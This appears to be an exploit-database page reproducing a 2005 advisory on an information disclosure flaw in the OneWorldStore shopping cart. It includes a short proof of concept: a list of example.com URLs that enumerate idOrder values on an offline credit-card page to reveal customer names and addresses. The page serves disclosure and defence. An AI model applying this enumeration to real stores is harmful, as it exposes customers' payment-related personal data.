header-logo
Suggest Exploit
vendor:
OneWorldStore
by:
SecurityFocus
2.6
CVSS
LOW
Information Disclosure
200
CWE
Product Name: OneWorldStore
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

OneWorldStore Information Disclosure Vulnerability

OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Exploitation of this vulnerability would expose the customer names, as they appear on credit cards, and their addresses to the attacker.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13361/info

OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

Exploitation of this vulnerability would expose the customer names, as they appear on credit cards, and their addresses to the attacker. 

http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=

Navigation

Suggest Exploit

Services By CQR